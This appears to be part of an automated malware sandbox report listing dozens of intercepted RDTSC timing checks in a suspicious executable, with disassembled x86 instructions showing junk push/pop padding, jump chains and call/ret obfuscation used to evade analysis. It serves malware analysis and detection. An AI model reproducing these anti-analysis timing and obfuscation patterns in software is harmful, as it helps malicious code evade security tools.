                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FEFB second address: F3FF70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push edi 0x0000000c jns 00007F91E851B8D6h 0x00000012 pop edi 0x00000013 jo 00007F91E851B8DCh 0x00000019 jnl 00007F91E851B8D6h 0x0000001f popad 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 jmp 00007F91E851B8E6h 0x00000029 pop eax 0x0000002a push edx 0x0000002b pop edi 0x0000002c lea ebx, dword ptr [ebp+138949C7h] 0x00000032 mov dword ptr [ebp+1371397Bh], ebx 0x00000038 xchg eax, ebx 0x00000039 push edi 0x0000003a jmp 00007F91E851B8E1h 0x0000003f pop edi 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F91E851B8E5h 0x00000048 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FF70 second address: F3FF7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F91E8D54016h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F2E650 second address: F2E669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8DBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F2E669 second address: F2E69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F91E8D54016h 0x0000000c jmp 00007F91E8D54021h 0x00000011 jns 00007F91E8D54016h 0x00000017 jmp 00007F91E8D54020h 0x0000001c popad 0x0000001d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F2E69D second address: F2E6A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5EFD5 second address: F5EFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F91E8D54016h 0x0000000a pop ebx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F12F second address: F5F149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8DDh 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F149 second address: F5F155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F91E8D54016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F155 second address: F5F16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F91E851B8DAh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F16A second address: F5F175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F175 second address: F5F179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F179 second address: F5F181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F181 second address: F5F188 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F2CF second address: F5F2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F91E8D54016h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F2DE second address: F5F2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F2E2 second address: F5F2F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F91E8D5401Ah 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5F9B1 second address: F5F9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5FB2E second address: F5FB49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91E8D54027h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5FCAA second address: F5FCB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5FCB0 second address: F5FCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5FCB4 second address: F5FCBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5FCBE second address: F5FCC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F5FCC2 second address: F5FD02 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F91E851B8E5h 0x00000012 jmp 00007F91E851B8E8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F60114 second address: F6011D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6026A second address: F60274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F91E851B8D6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F60274 second address: F602C0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F91E8D54016h 0x00000008 jns 00007F91E8D54016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 pushad 0x00000012 jmp 00007F91E8D54029h 0x00000017 jbe 00007F91E8D5401Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F91E8D54023h 0x00000024 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F602C0 second address: F602C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F608EE second address: F608F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F608F3 second address: F608F8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F60C9D second address: F60CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F64193 second address: F641A5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F91E851B8D6h 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F641A5 second address: F641B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F641B2 second address: F641B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F641B6 second address: F641BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F68F2D second address: F68F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6A44B second address: F6A451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6A451 second address: F6A45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F91E851B8D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6A45E second address: F6A465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6A465 second address: F6A472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F91E851B8DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6A472 second address: F6A48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F91E8D5401Dh 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6A48B second address: F6A496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F91E851B8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6CFAF second address: F6CFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6CFB5 second address: F6CFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F91E851B8E2h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6D148 second address: F6D154 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F91E8D54016h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6D40A second address: F6D422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F91E851B8DDh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6D727 second address: F6D72B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6D9F7 second address: F6D9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6D9FB second address: F6DA1F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F91E8D54016h 0x00000008 jmp 00007F91E8D54024h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6DA1F second address: F6DA25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F70F10 second address: F70F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91E8D54028h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F70F2C second address: F70F5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F91E851B8DBh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F70F5C second address: F70F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F70F60 second address: F70F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F71B3B second address: F71B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F71BA9 second address: F71BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F71BAE second address: F71C26 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91E8D5401Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F91E8D54024h 0x00000011 xchg eax, ebx 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F91E8D54018h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c cld 0x0000002d jmp 00007F91E8D54028h 0x00000032 cmc 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F91E8D54025h 0x0000003b rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F71F83 second address: F71F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F720BF second address: F720C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F720C4 second address: F720F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F91E851B8E3h 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F720F0 second address: F720F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F721A1 second address: F721AB instructions: 0x00000000 rdtsc 0x00000002 js 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F73645 second address: F7365F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91E8D54025h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7478C second address: F74790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F74790 second address: F74796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F76217 second address: F7625F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c mov si, C173h 0x00000010 push 00000000h 0x00000012 ja 00007F91E851B8DAh 0x00000018 mov si, E3C1h 0x0000001c push 00000000h 0x0000001e movzx esi, si 0x00000021 sub dword ptr [ebp+138B79C8h], esi 0x00000027 xchg eax, ebx 0x00000028 jmp 00007F91E851B8E9h 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 push edi 0x00000032 pop edi 0x00000033 pop esi 0x00000034 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7625F second address: F76269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F91E8D54016h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F76C9A second address: F76C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F76C9E second address: F76CEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D5401Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F91E8D54026h 0x00000012 jnl 00007F91E8D54016h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F91E8D54029h 0x00000020 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F76CEC second address: F76CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F777EB second address: F777F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F777F1 second address: F777F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F777F5 second address: F77853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor esi, 7D2D13B5h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F91E8D54018h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F91E8D54018h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 push eax 0x0000004a jl 00007F91E8D54024h 0x00000050 push eax 0x00000051 push edx 0x00000052 push edx 0x00000053 pop edx 0x00000054 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F77853 second address: F77857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7827B second address: F78280 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7A3AD second address: F7A3BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F91E851B8D6h 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7A3BF second address: F7A454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54025h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F91E8D54025h 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F91E8D54018h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a sub dword ptr [ebp+13712E0Bh], ecx 0x00000030 ja 00007F91E8D5401Ch 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F91E8D54018h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 push 00000000h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7A454 second address: F7A458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7A458 second address: F7A45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7A45E second address: F7A468 instructions: 0x00000000 rdtsc 0x00000002 je 00007F91E851B8DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7BFCA second address: F7BFD4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91E8D5401Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7BFD4 second address: F7BFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7BFDB second address: F7BFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7BFE1 second address: F7C000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push esi 0x00000009 ja 00007F91E851B8D6h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F91E851B8DBh 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7DA72 second address: F7DA78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F80EC7 second address: F80ECD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
